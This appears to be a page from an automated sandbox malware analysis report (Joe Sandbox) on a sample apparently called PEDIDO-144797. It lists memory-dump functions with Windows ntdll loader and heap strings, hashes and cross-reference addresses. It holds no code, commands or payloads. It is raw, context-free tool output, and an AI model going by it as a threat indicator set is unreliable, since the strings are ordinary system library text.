• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
• API String ID: 0-2515994595
• Opcode ID: be1f67843f8cfdb3e71c3a37805793abfa9402aac4cda83d1b977c35beb8cd27
• Instruction ID: c28543b60bb32a88ec1857ca9bfcfa59f56be04d1e947030d7b40ce1f7dea7e8
• Opcode Fuzzy Hash: be1f67843f8cfdb3e71c3a37805793abfa9402aac4cda83d1b977c35beb8cd27
• Instruction Fuzzy Hash: 0351DFB55143199BD326CF18EE41BABB7EDFF85354F00491DBA588B240EB70E604CB92
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
• API String ID: 3446177414-1745908468
• Opcode ID: a95a49ea9b80a535c4b684c0a4dafd5cc0128dc7ca08e362dfa57bafdd40d9f1
• Instruction ID: 89be3a8e08f4545add1c69a31f40f14e0c4969597a0df322abbed8d139c7e9ed
• Opcode Fuzzy Hash: a95a49ea9b80a535c4b684c0a4dafd5cc0128dc7ca08e362dfa57bafdd40d9f1
• Instruction Fuzzy Hash: C4910F35900745DFEB02CFA8C850AEEBBF2FF49318F14845AE854AB251CF7A9942CB55
APIs
• RtlDebugPrintTimes.NTDLL ref: 3269651C
  • Part of subcall function 32696565: RtlDebugPrintTimes.NTDLL ref: 32696614
  • Part of subcall function 32696565: RtlDebugPrintTimes.NTDLL ref: 3269665F
Strings
• minkernel\ntdll\ldrinit.c, xrefs: 326F97A0, 326F97C9
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 326F977C
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 326F97B9
• LdrpInitShimEngine, xrefs: 326F9783, 326F9796, 326F97BF
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 326F9790
• apphelp.dll, xrefs: 32696446
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 3446177414-204845295
• Opcode ID: ee3bfa53df810f0b9ba04ada32b0763197bc8f2f09ddf77d87ebb6223622dfa0
• Instruction ID: a6f66e7e34cf70c67345833ee2080d459b6c49ea922abe9ead1ee8941ff27c84
• Opcode Fuzzy Hash: ee3bfa53df810f0b9ba04ada32b0763197bc8f2f09ddf77d87ebb6223622dfa0
• Instruction Fuzzy Hash: C651AE7164A340AFE724CF24C890F9B77E8FF84758F400919FA95AB2A0DE71D945CB92
Strings
• @, xrefs: 3269D24F
• \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3269D06F
• Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3269D0E6
• h.l2, xrefs: 326FA5D2
• Control Panel\Desktop\LanguageConfiguration, xrefs: 3269D136
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3269D263
• Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3269D202
• @, xrefs: 3269D2B3
• @, xrefs: 3269D09D
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.l2
• API String ID: 0-2525076677
• Opcode ID: 012c86559cd5ca1959f388bf1ae7d6f6af1d826ea72efa459e199b4cd83b078c
• Instruction ID: 3d59df1f130f6c05025db64c315fd24fe568a83512106529398e381efa2b9eb2
• Opcode Fuzzy Hash: 012c86559cd5ca1959f388bf1ae7d6f6af1d826ea72efa459e199b4cd83b078c
• Instruction Fuzzy Hash: DAA17EB24083459FE721DF24C980B9BB7E8BF88755F00492EF98996241DB74C908CF93
APIs
• RtlDebugPrintTimes.NTDLL ref: 326CD879
  • Part of subcall function 326A4779: RtlDebugPrintTimes.NTDLL ref: 326A4817
Strings
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
• API String ID: 3446177414-1975516107
• Opcode ID: 0c7a0fcb353edef0c4a104d39434ab6c763b317f20ac1e0f1f10139ebe36fe27
• Instruction ID: 41366e7c7cc42d171c635fc59f20505cfdee51c69ee0118af91cd2dd81fc4f1a
• Opcode Fuzzy Hash: 0c7a0fcb353edef0c4a104d39434ab6c763b317f20ac1e0f1f10139ebe36fe27
• Instruction Fuzzy Hash: C1512375A45395DFEB08DFA4C58478DBBF1FF44318F504069D800AB282DBB0A986CF90
Strings
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 327286E7
• VerifierFlags, xrefs: 327288D0
• AVRF: -*- final list of providers -*- , xrefs: 3272880F
• HandleTraces, xrefs: 3272890F
• VerifierDebug, xrefs: 32728925
• AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 327286BD
• VerifierDlls, xrefs: 3272893D
Memory Dump Source
• Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
• Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
• API String ID: 0-3223716464
• Opcode ID: 93fa971036a4966ea2b12584316554163dd7fe05147cef759166417a81a8f71b
• Instruction ID: 5852e9a086deeca830fb17b86fea90e7d9227813149ad8ffb219020dc6d3ec9d
• Opcode Fuzzy Hash: 93fa971036a4966ea2b12584316554163dd7fe05147cef759166417a81a8f71b
• Instruction Fuzzy Hash: E69112B1A42361EFE311CF689880B5A77A9FF44B54F450959F9807F350CB729C06CBA6
Strings
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 3270A7AF
                                                                                                                                          • DGg2, xrefs: 326C2382
                                                                                                                                          • LdrpDynamicShimModule, xrefs: 3270A7A5
                                                                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3270A79F
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: DGg2$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-1866695378
                                                                                                                                          • Opcode ID: 8208547195aec02d14c642f079388e3560e24e765131028747e02f52c045685d
                                                                                                                                          • Instruction ID: fef28806dfacb7fa1232ad11287bf3ae6653f35ca5eb5460fb2507c0718f30ff
                                                                                                                                          • Opcode Fuzzy Hash: 8208547195aec02d14c642f079388e3560e24e765131028747e02f52c045685d
                                                                                                                                          • Instruction Fuzzy Hash: 58310276A40341EBEB159F59C895E5A77F5FF80750F108469EA017B250DAB0A88BCF90
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                          • API String ID: 0-523794902
                                                                                                                                          • Opcode ID: f7cc2714f641a28508cad06bdf149ad445e53bf18f8860b4d88b333bf792d804
                                                                                                                                          • Instruction ID: e5ae669468999632111e7e1164cb4e5d6aef778cc35114694fc371ce8fe02957
                                                                                                                                          • Opcode Fuzzy Hash: f7cc2714f641a28508cad06bdf149ad445e53bf18f8860b4d88b333bf792d804
                                                                                                                                          • Instruction Fuzzy Hash: D742F275208781AFD709CF28C480B9ABBE9FF85748F05496DE8858B352DF75E841CB92
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.l2
                                                                                                                                          • API String ID: 0-2273862861
                                                                                                                                          • Opcode ID: b39788e11a1a531ed064d9ebc00b972e63c0393048eaf89e64d886428322abe7
                                                                                                                                          • Instruction ID: 8c178a88bae5b2c24be9c7338d5fd032711649b82495cbf76158dcdf5db81a06
                                                                                                                                          • Opcode Fuzzy Hash: b39788e11a1a531ed064d9ebc00b972e63c0393048eaf89e64d886428322abe7
                                                                                                                                          • Instruction Fuzzy Hash: 48F14AB6D01228EBDB15DF99C990ADEBBF8FF48754F50405AE501B7210EBB49E01CBA4
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                          • API String ID: 0-122214566
                                                                                                                                          • Opcode ID: cbc48d3e18783a43e881608c7c14114fcecfa079f102c233e4ad769de811d9d4
                                                                                                                                          • Instruction ID: 469f740d32341c6c867f5f90b3fdc76265879fa9af2c96f25010d17d2e56c843
                                                                                                                                          • Opcode Fuzzy Hash: cbc48d3e18783a43e881608c7c14114fcecfa079f102c233e4ad769de811d9d4
                                                                                                                                          • Instruction Fuzzy Hash: 5BC10175A00315ABEF188B66C890BBFB7A5BF45714F54816DEC02AF290EBB0CD48C791
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-792281065
                                                                                                                                          • Opcode ID: e17906d2db6514577da29180d66ecef3884843833f6fa8feb4784eb4000701bc
                                                                                                                                          • Instruction ID: 8d12289d90a7f1f1a4c65e8cc241f5a345889c13911c29c4158d189d3b7b8dde
                                                                                                                                          • Opcode Fuzzy Hash: e17906d2db6514577da29180d66ecef3884843833f6fa8feb4784eb4000701bc
                                                                                                                                          • Instruction Fuzzy Hash: 8F919970A42359DFFB28DF25D954B9A3BA1FF41768F000169E9157F280CBB0A842CBD5
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                          • API String ID: 0-4253913091
                                                                                                                                          • Opcode ID: 0610329d4689079d9cae7cddeef4c5e751be7554e20fa2dfa36030d54995b4e9
                                                                                                                                          • Instruction ID: 8647a4c8a37264394255922f7e41777c7be4a9630ee7b2213feb594949320879
                                                                                                                                          • Opcode Fuzzy Hash: 0610329d4689079d9cae7cddeef4c5e751be7554e20fa2dfa36030d54995b4e9
                                                                                                                                          • Instruction Fuzzy Hash: AFF1BC74A04A05DFEB09CF69C894B6ABBF6FF45344F1481A8E8059B381DB70E985CF91
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                          • API String ID: 3446177414-2283098728
                                                                                                                                          • Opcode ID: 7c97a3b45838db7c752025a4fcde71c90d0e40eef63977560497a285e204d504
                                                                                                                                          • Instruction ID: 23f37e61cb3444fd058f37733ba08d87e21b9c7c259ad5c0df256199e0fe0d91
                                                                                                                                          • Opcode Fuzzy Hash: 7c97a3b45838db7c752025a4fcde71c90d0e40eef63977560497a285e204d504
                                                                                                                                          • Instruction Fuzzy Hash: CA5123716077219BE718EF38C884B2A77A1FF84314F140A6DE8519B691DBB0E845CBA6
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 327180F3
                                                                                                                                          • Failed to reallocate the system dirs string !, xrefs: 327180E2
                                                                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 327180E9
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 3446177414-1783798831
                                                                                                                                          • Opcode ID: 1694558c58c405c6d58ec3da0dfbc177539a0f609825f7e1edc30ffc02af8713
                                                                                                                                          • Instruction ID: d927977129b54545c9bf55b2a36642cd28daa06c35a14f8b3eb3de4fce655d1a
                                                                                                                                          • Opcode Fuzzy Hash: 1694558c58c405c6d58ec3da0dfbc177539a0f609825f7e1edc30ffc02af8713
                                                                                                                                          • Instruction Fuzzy Hash: 0E4117B9541388ABE721EB25DC44F4B77E8FF44750F10492AF858E7250DB74E842CB96
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          • LdrpCheckRedirection, xrefs: 3272450F
                                                                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32724508
                                                                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 32724519
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                          • API String ID: 3446177414-3154609507
                                                                                                                                          • Opcode ID: 4ee6e8a7f08fe214348c17f550c998a81c63fb0cc14685d56721a5a5c0457c7b
                                                                                                                                          • Instruction ID: 9664666d44a53158c052ad0f90b2b10089d9df511db2dc806525c40a346c4320
                                                                                                                                          • Opcode Fuzzy Hash: 4ee6e8a7f08fe214348c17f550c998a81c63fb0cc14685d56721a5a5c0457c7b
                                                                                                                                          • Instruction Fuzzy Hash: 514103766053119FDB21CF68C860A1677E6FF48794F060659EC88EF351DB31E801CB81
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                          • API String ID: 0-3061284088
                                                                                                                                          • Opcode ID: 21e0fd0ddb521ac5ae22f1c7b9121a163131cbf4e17026a64aa5d7b4b97086f4
                                                                                                                                          • Instruction ID: 0f517cf52bdf24828157c861e99a2806bfa9847e8bd806932b83a1087c4e25d5
                                                                                                                                          • Opcode Fuzzy Hash: 21e0fd0ddb521ac5ae22f1c7b9121a163131cbf4e17026a64aa5d7b4b97086f4
                                                                                                                                          • Instruction Fuzzy Hash: E301FC77029280AEE709C72CE819FC277A8EF42F75F19449DE40047591DEB69C40D555
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                          • API String ID: 0-379654539
                                                                                                                                          • Opcode ID: 5be8f1f75a4b4e0847f03a813ab665b400870b398f5c212564fa8c6b0cc2468f
                                                                                                                                          • Instruction ID: 6e156d5dbe18fb104892fa136ecfdb37bebbdcad2a64bb657a5ba22ca2133d63
                                                                                                                                          • Opcode Fuzzy Hash: 5be8f1f75a4b4e0847f03a813ab665b400870b398f5c212564fa8c6b0cc2468f
                                                                                                                                          • Instruction Fuzzy Hash: C4C176B51083828FE319CF19C950B5AB7F4FF85748F00886AF8858B250EB74CD4ACB66
                                                                                                                                          Strings
                                                                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 326D8341
                                                                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 326D847E
                                                                                                                                          • @, xrefs: 326D84B1
                                                                                                                                          • LdrpInitializeProcess, xrefs: 326D8342
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                          • API String ID: 0-1918872054
                                                                                                                                          • Opcode ID: 1fdb5a7b51be8e7b953e792807c97c37b1451cf2109be3ae82e17cff1b3cb651
                                                                                                                                          • Instruction ID: e7dcd980845f9deb6ccb39fa68841f7caccdd568675d863d252a6816c0eb70d7
                                                                                                                                          • Opcode Fuzzy Hash: 1fdb5a7b51be8e7b953e792807c97c37b1451cf2109be3ae82e17cff1b3cb651
                                                                                                                                          • Instruction Fuzzy Hash: 9591EC71509388AFE721CE21D944FABB7ECFF84784F40082EFA8992150E774E945CB66
                                                                                                                                          Strings
                                                                                                                                          • .Local, xrefs: 326D27F8
                                                                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 327120C0
                                                                                                                                          • SXS: %s() passed the empty activation context, xrefs: 32711FE8
                                                                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 32711FE3, 327120BB
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                          • API String ID: 0-1239276146
                                                                                                                                          • Opcode ID: f68859c1ba4b0c6bce7f4eb84b213d5337e0c7ca98d7175cdf096e7d61861d0e
                                                                                                                                          • Instruction ID: 3646117fc5d081e83a72be6bfc6f81f903731a0a1f4e7c501bd90d920352cdd5
                                                                                                                                          • Opcode Fuzzy Hash: f68859c1ba4b0c6bce7f4eb84b213d5337e0c7ca98d7175cdf096e7d61861d0e
                                                                                                                                          • Instruction Fuzzy Hash: B8A1CF75A4032D9FDB24CF64CC84B99B3B1BF58354F1002EAD809AB256DB70AE85CF95
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit$X}h2
                                                                                                                                          • API String ID: 0-3451996185
                                                                                                                                          • Opcode ID: 65eeaa265cad10e2c0d52b926309d02bd1577d1acbcef7367bf70289a7800568
                                                                                                                                          • Instruction ID: 895138aece2ca62c0639247803a366ef44a3e1b6e08d2b6a4405d8a2ade9d006
                                                                                                                                          • Opcode Fuzzy Hash: 65eeaa265cad10e2c0d52b926309d02bd1577d1acbcef7367bf70289a7800568
                                                                                                                                          • Instruction Fuzzy Hash: 4D81C17160A350AFE722CB25C840B6AB7E9FF84754F48492DFA419F291DBB4D900CBD2
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000002.00000002.90098272622.0000000032670000.00000040.00001000.00020000.00000000.sdmp, Offset: 32670000, based on PE: true
                                                                                                                                          • Associated: 00000002.00000002.90098272622.0000000032799000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000002.00000002.90098272622.000000003279D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_2_2_32670000_PEDIDO-144797.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
